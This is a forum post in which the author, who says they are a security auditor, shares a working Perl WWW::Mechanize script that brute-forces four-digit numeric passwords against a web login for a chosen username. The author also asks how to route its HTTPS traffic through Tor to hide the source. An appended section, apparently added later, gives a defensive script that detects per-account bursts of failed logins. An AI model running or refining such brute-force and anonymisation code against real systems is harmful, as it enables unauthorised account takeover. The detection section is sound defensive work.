Kind Monks,
I have a rather peculiar problem. Before I get to it, let me describe my situation (or you can skip to 'PROBLEM'), so you may understand my intentions are noble. I am a security auditor for my company, and my task is to find the vulnerable holes before malicious hackers do. My current project involves auditing their timesheet login page. My goal is to test for weak passwords, namely, the numeric possibilities from 1-9999 (I have my own list of usernames). I have coded a rudimentary Perl program that handles the requests and logs the requests nicely. However, I am requested to perform the audit from an outsider's perspective, i.e., no prior knowledge of the company. In keeping with the spirit of my directive, I'm using Tor to anonymize the connections. Tor runs as a proxy on localhost, and redirects the connections from there. It handles HTTP and HTTPS fine in my web browser, but not with my script. That brings me to my...
PROBLEM:
I cannot get SSL connections to use a proxy specified through WWW::Mechanize. HTTP connections appear to correctly filter through the proxy. The proxy is running on 127.0.0.1:8118, and handles HTTP/HTTPS fine. Netmon confirms these suspicions about TCP/SSL traffic from my script being handled differently.
SOLUTIONS ATTEMPTED:
1. Setting HTTP_Proxy and HTTPS_Proxy environment variables by hand
2. Using 'use Crypt::SSLeay'
3. Trying alternate proxy (web proxies)
What follows is the code for my program (naturally sanitized to remove sensitive info). I have searched far and wide for the answer, but cannot get a working solution. Monks, can you help me? It would be most appreciated.
CODE:
#!/usr/bin/perl
#Thanks to IBM for helping to create this - Bret Sweeden especially
#NBTDOTM
use strict;
use warnings;
use WWW::Mechanize;
use HTTP::Cookies;
#$ENV{HTTPS_PROXY} = '127.0.0.1:8118';
#$ENV{HTTP_PROXY} = '127.0.0.1:8118';
#Determine the number of arguments the user has given us
if (@ARGV != 2) {
    #Our user has not entered enough information. Display help screen.
    header();
    exit();
}
#Our user has entered enough for an attack. Begin!
my ($host, $user) = @ARGV; #Host is the first argument, username the 2nd
#Display header
print qq{
----------------------------------------------------------------------
Login Brute-Forcer
Custom Built by Juno
NBTDOTM
----------------------------------------------------------------------
};
print "\nYour host is: $host";
print "\nYour username is: $user";
print "\n\nThe program will now try bruteforcing the host you selected";
my $url = $host;
my $username = $user;
#Try every value from 0001 to 9999, zero-padded to four places
for my $i (1 .. 9999) {
    my $password = sprintf("%04d", $i);
    my $outfile  = "$password.htm";
    print "\nTrying password $password...";
    my $mech = WWW::Mechanize->new();
    $mech->cookie_jar(HTTP::Cookies->new());
    #Send both HTTP and HTTPS through the local proxy (one proxy URL
    #serves both schemes)
    $mech->proxy(['http', 'https'], 'http://127.0.0.1:8118/');
    $mech->get($url);
    #$mech->form_name('j');
    $mech->field(j_username => $username);
    $mech->field(j_password => $password);
    $mech->click();
    $mech->click();
    #Save the response page for later inspection
    my $output_page = $mech->content();
    open(my $out, '>', $outfile) or die "Cannot write $outfile: $!";
    print $out $output_page;
    close($out);
    print " Done.";
}
print "\n\nAudit complete!";
exit();

sub header {
    print qq{
----------------------------------------------------------------------
Login Brute-Forcer
Custom Built by Juno
NBTDOTM
----------------------------------------------------------------------
Usage: GHGbrute -[target site] -[user]
Example: GHGbrute somesite.com -admin
The program will attempt a numerical bruteforce to four places.
};
}
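A note from the other side of the wire, as an added example that is not part of the original post: a run like the one above sends thousands of guesses against a single account, and because Tor spreads the connections over changing exit addresses, a login monitor that counts failures per source IP sees only a trickle from each address, while one that counts per account sees the whole burst. The script below shows that contrast. The log format (`<epoch> LOGIN_FAILED user=<name> src=<ip>`), the sample lines and the `find_bursts` helper are all constructed for this example; none of it comes from WWW::Mechanize or from the poster's code.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Assumed application-log format (constructed for this example):
#   <epoch-seconds> LOGIN_FAILED user=<name> src=<ip>
# Anything that does not match is ignored.
sub parse_failure {
    my ($line) = @_;
    return unless $line =~ /^(\d+)\s+LOGIN_FAILED\s+user=(\S+)\s+src=(\S+)/;
    return { time => $1, user => $2, src => $3 };
}

# Group failures by $key ('user' or 'src') and, for each group, find the
# largest number of failures that fall inside any $window-second span.
# Returns a hashref of key => count for every group above $threshold.
sub find_bursts {
    my ($lines, $key, $window, $threshold) = @_;
    my %times;
    for my $line (@$lines) {
        my $ev = parse_failure($line) or next;
        push @{ $times{ $ev->{$key} } }, $ev->{time};
    }
    my %hits;
    for my $who (keys %times) {
        my @t = sort { $a <=> $b } @{ $times{$who} };
        my ($start, $best) = (0, 0);
        for my $end (0 .. $#t) {
            # slide the window start forward until it spans <= $window seconds
            $start++ while $t[$end] - $t[$start] > $window;
            my $n = $end - $start + 1;
            $best = $n if $n > $best;
        }
        $hits{$who} = $best if $best > $threshold;
    }
    return \%hits;
}

# Constructed sample: 'jdoe' receives guesses spread across three addresses
# (two failures each, within a few seconds); 'asmith' mistypes twice,
# several minutes apart.
my @sample = (
    "1700000000 LOGIN_FAILED user=jdoe src=198.51.100.7",
    "1700000001 LOGIN_FAILED user=jdoe src=203.0.113.9",
    "1700000002 LOGIN_FAILED user=jdoe src=198.51.100.7",
    "1700000003 LOGIN_FAILED user=jdoe src=192.0.2.44",
    "1700000004 LOGIN_FAILED user=jdoe src=203.0.113.9",
    "1700000005 LOGIN_FAILED user=jdoe src=192.0.2.44",
    "1700000010 LOGIN_FAILED user=asmith src=10.1.2.3",
    "1700000400 LOGIN_FAILED user=asmith src=10.1.2.3",
    "this line is not a login event and is skipped",
);

my $window    = 60;   # seconds
my $threshold = 3;    # more than this many failures in one window is a burst

my $by_src  = find_bursts(\@sample, 'src',  $window, $threshold);
my $by_user = find_bursts(\@sample, 'user', $window, $threshold);

# Per-source counting finds nothing: no address exceeds two failures.
printf "per-source: %d address(es) over threshold\n", scalar keys %$by_src;

# Per-account counting flags jdoe with all six failures in one window.
for my $u (sort keys %$by_user) {
    print "ALERT: $u had $by_user->{$u} failed logins within ${window}s\n";
}
```

With the sample above the per-source pass reports zero addresses over threshold and the per-account pass prints one alert for jdoe with six failures, which is the reason account-level lockout or throttling, rather than IP-level throttling alone, is what blunts a numeric password sweep like the one in the post.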